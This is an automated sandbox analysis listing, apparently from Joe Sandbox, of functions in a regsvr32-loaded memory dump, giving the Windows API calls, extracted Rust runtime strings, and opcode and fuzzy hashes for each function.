Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$CloseHandle
String ID:
API String ID: 1910495013-0
Opcode ID: f666784d679325d9f89b3a0132f563695c145a0220450f85ca7027d123658662
Instruction ID: b4e23952816223396b7681d73494158317d9fdac69b9e68a5af606650568be99
Opcode Fuzzy Hash: f666784d679325d9f89b3a0132f563695c145a0220450f85ca7027d123658662
Instruction Fuzzy Hash: 4B113D1190EEC2A0EA64EF56D4543FAA3B1FFC87C4F446071D54EC66AACF7DE4448601

Function 00007FF8A934B094 Relevance: 6.3, APIs: 5, Instructions: 31memoryCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF8A934B0EB
HeapFree.KERNEL32 ref: 00007FF8A934B123
HeapFree.KERNEL32 ref: 00007FF8A934B142
CloseHandle.KERNEL32 ref: 00007FF8A934B153
CloseHandle.KERNEL32 ref: 00007FF8A934B15C

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: CloseHandle$FreeHeap
String ID:
API String ID: 2735614835-0
Opcode ID: f791c38d76cd835e94ce239caee589e6f48de2c7c8aa2c2ff2737a9cd4f1ca30
Instruction ID: c75b73c0cb500d38202898bcffd37bdf7e7d02a789d03b6336f6bd5cdaa87670
Opcode Fuzzy Hash: f791c38d76cd835e94ce239caee589e6f48de2c7c8aa2c2ff2737a9cd4f1ca30
Instruction Fuzzy Hash: AD01FB1590EEC2B8FB28AF22C8653FD2270EF857C9F417472D90ECA6D6CE2CE1449241

Function 00007FF8A934B0A5 Relevance: 6.3, APIs: 5, Instructions: 31memoryCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF8A934B0EB
HeapFree.KERNEL32 ref: 00007FF8A934B123
HeapFree.KERNEL32 ref: 00007FF8A934B142
CloseHandle.KERNEL32 ref: 00007FF8A934B153
CloseHandle.KERNEL32 ref: 00007FF8A934B15C

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: CloseHandle$FreeHeap
String ID:
API String ID: 2735614835-0
Opcode ID: baa4109bac70fc4e0d9396353063245ec76f4ec9211646d206311f8c180a8004
Instruction ID: fb3b4befa2b7dd3ad6064eff43bfa9ae006fe82bc66fb1acfef3bcb1148bc348
Opcode Fuzzy Hash: baa4109bac70fc4e0d9396353063245ec76f4ec9211646d206311f8c180a8004
Instruction Fuzzy Hash: 3401E81590EEC2B8FB28AF2188653FD2270EF857C9F407476D90ECA6D6CE2CE144D241

Function 00007FF8A934B0BB Relevance: 6.3, APIs: 5, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF8A934B0EB
HeapFree.KERNEL32 ref: 00007FF8A934B123
HeapFree.KERNEL32 ref: 00007FF8A934B142
CloseHandle.KERNEL32 ref: 00007FF8A934B153
CloseHandle.KERNEL32 ref: 00007FF8A934B15C

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: CloseHandle$FreeHeap
String ID:
API String ID: 2735614835-0
Opcode ID: d3495ba5369f1b84fde97e31c708fbcd0bbb5f608b6357f81fea9dd0b8dc9a8f
Instruction ID: e401032a9ffcb7d101c47fd9ea45cfdde82367b9b41a075860f583572aefa704
Opcode Fuzzy Hash: d3495ba5369f1b84fde97e31c708fbcd0bbb5f608b6357f81fea9dd0b8dc9a8f
Instruction Fuzzy Hash: 82F0CD1490EEC2B8FB64AF2288653FD1270EF897C5F417471D90ECA6D6CE2CE1449241

Function 00007FF8A934B0C8 Relevance: 6.3, APIs: 5, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF8A934B0EB
HeapFree.KERNEL32 ref: 00007FF8A934B123
HeapFree.KERNEL32 ref: 00007FF8A934B142
CloseHandle.KERNEL32 ref: 00007FF8A934B153
CloseHandle.KERNEL32 ref: 00007FF8A934B15C

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: CloseHandle$FreeHeap
String ID:
API String ID: 2735614835-0
Opcode ID: 97b32e02ad1eccc2b50d9cae848424f80373cb73d580784eee50bb38dd2ff019
Instruction ID: 5d3b45404de0cc00e531871d321019171b434ab1c97567c928382c15dc466dff
Opcode Fuzzy Hash: 97b32e02ad1eccc2b50d9cae848424f80373cb73d580784eee50bb38dd2ff019
Instruction Fuzzy Hash: ADF0E11490EEC2B8FB64AF2198553FD1270EF897C5F417471D90ECA6D6CE2DE144D241

Function 00007FF8A934B0E0 Relevance: 6.3, APIs: 5, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF8A934B0EB
HeapFree.KERNEL32 ref: 00007FF8A934B123
HeapFree.KERNEL32 ref: 00007FF8A934B142
CloseHandle.KERNEL32 ref: 00007FF8A934B153
CloseHandle.KERNEL32 ref: 00007FF8A934B15C

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: CloseHandle$FreeHeap
String ID:
API String ID: 2735614835-0
Opcode ID: d1cca292100bf6de69836079573cc3af6bdf7c24fc5e777f98ca4a24b2839049
Instruction ID: c4de0cf5b6776a1b2f6d730a47832aefc49456775da77ac0f96f5a8328d4d7c1
Opcode Fuzzy Hash: d1cca292100bf6de69836079573cc3af6bdf7c24fc5e777f98ca4a24b2839049
Instruction Fuzzy Hash: 85F0C91490EEC2A8FB68AF2198653FD2270EF89BC9F407471D90ECA696CE2CE1449241

Function 00007FF8A9351CF4 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A9354020: RtlCaptureContext.NTDLL ref: 00007FF8A93540B2
Part of subcall function 00007FF8A9354020: RtlUnwindEx.KERNEL32 ref: 00007FF8A93540EF
Part of subcall function 00007FF8A9354020: abort.MSVCRT ref: 00007FF8A93540F5
Part of subcall function 00007FF8A9354020: RaiseException.KERNEL32 ref: 00007FF8A9354132

memset.MSVCRT ref: 00007FF8A9351D27
memset.MSVCRT ref: 00007FF8A9351DC7
memset.MSVCRT ref: 00007FF8A9351E67

Strings

assertion failed: filled <= self.buf.init/rustc/051478957371ee0084a7c0913941d2a8c4757bb9\library\core\src\io\borrowed_buf.rs, xrefs: 00007FF8A9351D78, 00007FF8A9351E18, 00007FF8A9351EB8

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: memset$CaptureContextExceptionRaiseUnwindabort
String ID: assertion failed: filled <= self.buf.init/rustc/051478957371ee0084a7c0913941d2a8c4757bb9\library\core\src\io\borrowed_buf.rs
API String ID: 2704192948-4183801151
Opcode ID: d5a33d3bddb0a4a780526fc9d236898dc735f92c5c76aebb881641ffe56a149a
Instruction ID: bb6d9ccae2046da1f3297936fb907ba9938cbc2e01e12af5dbe3a845118593dd
Opcode Fuzzy Hash: d5a33d3bddb0a4a780526fc9d236898dc735f92c5c76aebb881641ffe56a149a
Instruction Fuzzy Hash: 6751E693A0EAC166E715DFA2A8442B9AB70FB49BD0F59A431CF4DD3792DD3CD5828300

Function 00007FF8A9341320 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 165memoryCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF8A93413AB
HeapFree.KERNEL32 ref: 00007FF8A934167E
CloseHandle.KERNEL32 ref: 00007FF8A9341724

Strings

.exeprogram not found, xrefs: 00007FF8A93413C4

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: CloseFreeHandleHeapmemcpy
String ID: .exeprogram not found
API String ID: 1491206654-419964536
Opcode ID: 276690e03bd6044dbc9c08db838838f13a27c421a85d06b98499b2c59bc1a317
Instruction ID: 4a4b2db5ff5fda39835db423715657b11ca69b57eb8671e65514cc49283df922
Opcode Fuzzy Hash: 276690e03bd6044dbc9c08db838838f13a27c421a85d06b98499b2c59bc1a317
Instruction Fuzzy Hash: 20716C62B5EF9294FB648FA199903FD22B1EB957C9F056035DE0E97B88DF3891418300

Function 00007FF8A9301010 Relevance: 6.1, APIs: 4, Instructions: 107sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00007FF8A9301055
_amsg_exit.MSVCRT ref: 00007FF8A9301083

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: Sleep_amsg_exit
String ID:
API String ID: 1015461914-0
Opcode ID: 2806e2a2a2e69e3b7c85737c28f0dd3d7904b8af9b5a9a57c84f78b6dfa5bd1b
Instruction ID: 05366a39c5e56b20c720cf25d69155bd5586ec2b27077643f4dc91619610c3d7
Opcode Fuzzy Hash: 2806e2a2a2e69e3b7c85737c28f0dd3d7904b8af9b5a9a57c84f78b6dfa5bd1b
Instruction Fuzzy Hash: DB415B61A0EEC6A5FB294F96E89067A22F1EF487C0F44A071DA4DC7790DE6CE8418340

Function 00007FF8A9322B70 Relevance: 6.1, APIs: 4, Instructions: 67memoryfileCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9322BBC
HeapFree.KERNEL32 ref: 00007FF8A9322BD5
UnmapViewOfFile.KERNEL32 ref: 00007FF8A9322BF7
CloseHandle.KERNEL32 ref: 00007FF8A9322BFF

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$CloseFileHandleUnmapView
String ID:
API String ID: 238406573-0
Opcode ID: fdf93351b17bb99f04dc049e421e9081e2b00180d34b628a9a767d57385448be
Instruction ID: 632bfffa6e3b6101a41a1baa3f794714ed13b981bc8e2c2cdd364f991b8c0881
Opcode Fuzzy Hash: fdf93351b17bb99f04dc049e421e9081e2b00180d34b628a9a767d57385448be
Instruction Fuzzy Hash: 74215426A0FDC1A5E629DF1698443B967B0EB5C7D4F49A432CE0D86391DE3DE482D200

Function 00007FF8A934B170 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32 ref: 00007FF8A934B198
GetLastError.KERNEL32 ref: 00007FF8A934B1F1
CloseHandle.KERNEL32 ref: 00007FF8A934B232
CloseHandle.KERNEL32 ref: 00007FF8A934B23A

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: CloseHandle$CreateErrorEventLast
String ID:
API String ID: 3743700123-0
Opcode ID: 22774e09b3d67be6a5e0fec3e62d86911746476b66fcfe515472d2d116eec0d0
Instruction ID: e0ae4935b0a3d5a176bb35c217293c2db0f44059816f18ae994fa4fb95052830
Opcode Fuzzy Hash: 22774e09b3d67be6a5e0fec3e62d86911746476b66fcfe515472d2d116eec0d0
Instruction Fuzzy Hash: F911A522A0EB81A6F7195F12A5513792560FB887D0F186134DE4D47BC1DF7CE4A28300

Function 00007FF8A933FB65 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A933FBF9

Strings

mluf, xrefs: 00007FF8A933FBD1
RUST_BACKTRACElibrary\std\src\env.rs, xrefs: 00007FF8A933FB65
lluf, xrefs: 00007FF8A933FBDA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID: RUST_BACKTRACElibrary\std\src\env.rs$lluf$mluf
API String ID: 3298025750-2275200021
Opcode ID: 200d7e0c29b1dfca4d0256e81b9e4da546865e51008cc6a058b3c008fb9fbbf5
Instruction ID: b77864e7da161e399a215dfbbd7aacee9d2e96facad524d8ea33f5d687c913dc
Opcode Fuzzy Hash: 200d7e0c29b1dfca4d0256e81b9e4da546865e51008cc6a058b3c008fb9fbbf5
Instruction Fuzzy Hash: 0A01A166F4FED2A5FE288F7594A03BE2AB1DB407C8F44643AC90E86790CE2DE1409311

Function 00007FF8A930FC60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 00007FF8A935400B

Strings

CCG , xrefs: 00007FF8A9354006
TSUR, xrefs: 00007FF8A930FC8E

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: ExceptionRaise
String ID: CCG $TSUR
API String ID: 3997070919-2088351922
Opcode ID: 37d729a65597a38692ac768cf52d019ef1ce9e94d42c255c0a289bd06af29fff
Instruction ID: df8a60cef520bb4186047c185d581812cd22b4da6568b01d35fe833d4124cfb3
Opcode Fuzzy Hash: 37d729a65597a38692ac768cf52d019ef1ce9e94d42c255c0a289bd06af29fff
Instruction Fuzzy Hash: D721E122E2EEC596E614EF5198002BD6730FFD8B80F51A235EE8D43391EF2CD1918300

Function 00007FF8A932EAC0 Relevance: 5.2, APIs: 4, Instructions: 197memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(?,?,?,?,00007FF8A932EA56), ref: 00007FF8A932EBBC
HeapFree.KERNEL32(?,?,?,?,00007FF8A932EA56), ref: 00007FF8A932ECA4
HeapFree.KERNEL32(?,?,?,?,00007FF8A932EA56), ref: 00007FF8A932EDC2
HeapFree.KERNEL32(?,?,?,?,00007FF8A932EA56), ref: 00007FF8A932EDEC

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 693c0ca78a5ab491943ed54679dfc6408e036e4571ae0d6a34152cd519acba74
Instruction ID: 16a5e553855de7f4459ee8bfbbb32feefddd8433689b573db05490b5c24880dc
Opcode Fuzzy Hash: 693c0ca78a5ab491943ed54679dfc6408e036e4571ae0d6a34152cd519acba74
Instruction Fuzzy Hash: ED717D66A0EF8191EB649F5694413B967B4FF65BE0F44A631DE2E873D1DE389580C300

Function 00007FF8A934A690 Relevance: 5.2, APIs: 4, Instructions: 167memoryCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF8A934A794
memcpy.MSVCRT ref: 00007FF8A934A7AD
memcpy.MSVCRT ref: 00007FF8A934A831
HeapFree.KERNEL32 ref: 00007FF8A934A969

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: memcpy$FreeHeap
String ID:
API String ID: 4250714341-0
Opcode ID: 299d0f2c268ca4c8a6c9c2f47ee731c76563184286210afb219e3abc9259118d
Instruction ID: 31c1d6fe1b7a5a5486136b8f9a15c52685e373cbfeffc71bbb700ec45bed852e
Opcode Fuzzy Hash: 299d0f2c268ca4c8a6c9c2f47ee731c76563184286210afb219e3abc9259118d
Instruction Fuzzy Hash: 1C71CF22A09FC9A6EA459F24E8053F963B4FF543C8F45A231EE4D52665EF38E195C300

Function 00007FF8A93426BD Relevance: 5.2, APIs: 4, Instructions: 151memoryCOMMON

Download Yara Rule

APIs

